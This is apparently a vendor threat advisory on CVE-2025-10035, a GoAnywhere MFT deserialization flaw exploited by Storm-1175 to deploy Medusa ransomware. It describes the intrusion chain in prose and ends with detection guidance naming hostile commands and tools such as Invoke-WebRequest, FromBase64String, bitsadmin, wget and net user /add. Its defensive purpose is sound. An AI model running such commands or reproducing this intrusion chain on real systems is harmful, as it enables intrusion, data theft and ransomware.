CVE-2025-10035 in GoAnywhere MFT Actively Targeted by Storm-1175

Published Date: October 7, 2025

Category: ShadowOpsIntel

In late September 2025, a severe remote code execution vulnerability was disclosed in Fortra’s GoAnywhere Managed File Transfer (MFT) platform. Within days of disclosure, Microsoft Threat Intelligence observed active exploitation by the threat actor group Storm-1175, a cybercriminal entity associated with Medusa ransomware. This campaign represents a continuation of adversarial targeting of file transfer and data management systems, exploiting public-facing applications for initial access.

Severity: Critical

Vulnerability Exploited: Cve-2025-10035

Type: Deserialization to Remote Code Execution (RCE)
Component Affected: License Servlet Admin Console (GoAnywhere MFT ≤ v7.8.3)
CVSS Score: 10.0
Attack Vector: Remote / Unauthenticated
Description: The vulnerability allows attackers to bypass digital signature verification by crafting a forged license response, enabling arbitrary object deserialization. Once exploited, attackers can execute arbitrary commands, drop payloads, and maintain persistence on vulnerable servers.

Threat Actor: Storm-1175

Microsoft attributed the campaign to Storm-1175, an established financially motivated threat group known for:

Deploying Medusa ransomware in post-compromise environments
Leveraging public-facing application vulnerabilities for initial access
Using remote monitoring and management (RMM) tools such as SimpleHelp and MeshAgent for persistence and C2 communication

Storm-1175’s tactics mirror those seen in previous GoAnywhere exploitation campaigns (e.g., CVE-2023-0669), underscoring their operational expertise in targeting managed file transfer technologies.

Attack Details: Storm-1175 Exploitation Activity

Timeline: Exploitation activity was observed on September 11, 2025, targeting multiple organizations.
Entry Point: The threat actor exploited a zero-day deserialization flaw (CVE-2025-10035) in GoAnywhere MFT, allowing remote code execution without authentication.
Persistence: After gaining access, they installed RMM tools (SimpleHelp and MeshAgent) under the GoAnywhere process and created malicious .jsp web shells to maintain control.
Discovery & Lateral Movement: The attackers ran system and network scans (whoami, systeminfo, netscan) and used mstsc.exe (RDP) for lateral movement across the network.
Command & Control: They maintained encrypted C2 communication through Cloudflare tunnels and RMM tool connections.
Exfiltration: Rclone was used to exfiltrate data from compromised systems.
Impact: In at least one case, the attack ended with Medusa ransomware deployment, encrypting files and disrupting operations.

Recommendations

Upgrade GoAnywhere MFT immediately to a fixed version.
Ensure the GoAnywhere Admin Console is not exposed publicly to the internet.
Monitor for PowerShell execution from the GoAnywhere Tomcat process — specifically powershell.exe spawned from \GoAnywhere\ paths containing enumeration, credential, or download commands such as whoami, systeminfo, net user, Invoke-WebRequest, or FromBase64String. These indicate possible post-exploitation or reconnaissance activity linked to CVE-2025-10035.
Detect command-line activity where cmd.exe originates from the GoAnywhere Tomcat process executing utilities like powershell.exe, rundll32.exe, bitsadmin, or wget, or issuing commands such as nltest /dclist or net user /add. Such behavior strongly suggests lateral movement, persistence creation, or payload delivery following GoAnywhere exploitation.
Block the IOCs at their respective controls
https://www.virustotal.com/gui/collection/58169a0111510a82fb596ac8b37c90992cb4e975180c67f1cf503580b4fa82ec/iocs

Source:

Enjoyed reading this Threat Intelligence Advisory? Stay updated with our latest exclusive content by following us on Twitter and LinkedIn

No related posts found.